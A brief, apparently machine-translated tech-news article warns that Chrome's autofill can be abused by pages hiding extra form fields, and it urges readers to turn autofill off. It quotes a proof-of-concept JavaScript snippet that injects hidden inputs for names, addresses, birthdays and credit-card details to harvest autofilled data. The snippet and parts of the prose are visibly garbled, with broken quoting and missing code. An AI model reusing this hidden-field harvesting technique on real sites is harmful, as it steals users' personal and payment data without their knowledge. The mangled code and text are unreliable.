Autofill: why should you disable it immediately

Google Chrome has not yet fixed a known vulnerability in Autofill (autofill) published for 2013 for the first time.

With this vulnerability, a hacker can hide the fields of a login form on a web page, and Chrome will fill in his or her own personal information if you choose to use AutoFill or Autofill.

The following gif describes the problem:


The hampie user of GitHub presented it with the following JavaScript:

var-autocompletes = ['name', 'honorific-prefix', 'given-name', 'additionalname', 'familyname', 'honorific-suffix', 'nickname' ',' address-line1 ',' address-level2 ',' address-level3 ',' address-line4 ',' 'cc-name', 'cc-given-name', 'cc-additional', 'address-level3', 'address-level2', ' name, cc-exp-year, cc-exp-year, cc-csc, cc-type, transaction-currency 'bday', 'bday-day', 'bday-year', 'sex', 'url', 'photo', 'tel' 'tel-country-code', 'tel-national', 'tel-area-code', 'tel-local', 'tel-local-prefix' 'impp']; e-mailField.addEventListener ('focus', function () {var wrap = autocompletes.reduce (function (wrapper, field) {var input = document.createElement ('input'); // make them not focussable input.tabIndex = -1 ;); document.createElement ('div'); // Hide the wrapper wrap.classList.add ('hidden'); form.appendChild (wrap) ); // Inject the autocompletes once this.removeEventListener ('focus', arguments.callee);});

Of course, we recommend turning off Chrome's auto-fill feature immediately.
Let's also look at the fastest way to disable autocomplete on Chrome:

Open the address:


and disable the function:

That's it. You are safe from this exploit.

Registration in via Email

Enter your email to subscribe to the email notification service for new posts.

Read them Technology News from all over the world, with the validity of

Follow us on Google News at Google news